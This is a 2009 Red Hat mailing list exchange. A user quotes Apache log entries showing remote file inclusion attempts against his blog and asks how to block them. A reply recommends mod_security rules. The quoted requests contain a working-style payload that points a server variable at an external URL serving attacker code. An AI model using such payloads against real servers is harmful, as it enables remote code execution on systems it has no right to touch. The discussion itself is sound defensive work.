2009/8/5 Jose R R <jose.r.r@xxxxxxxxxxx>: > Good day- > > Although I go through my logs fairly often and update my scripts on an > regular basis, I still get cracker attacks like the ones sampled > below: > > 222.122.6.62 - - [04/Aug/2009:08:09:52 -0700] "GET > /blog/index.php/2008/06/02/os-2-warp-server-for-e-business-wseb-and?blog=4///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D? > HTTP/1.1" 400 567 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; > i686 Linux; 20020515)" > 222.122.6.62 - - [04/Aug/2009:08:11:18 -0700] "GET > /blog/index.php/2008/06/02///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D? > HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; > rv:1.7.12) Gecko/20050915 Firefox/1.0.7" > > I would appreciate suggestions to block automatically the above. I am > already using Fail2ban and some rules in IP tables. Notwithstanding > those above manage to get through. > > Thanks in advance for any input. If you are using Apache, the "authoritative" tool is mod_security, a web application firewall. With a simple set of rules you can drop this requests. Hope this helps. -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list
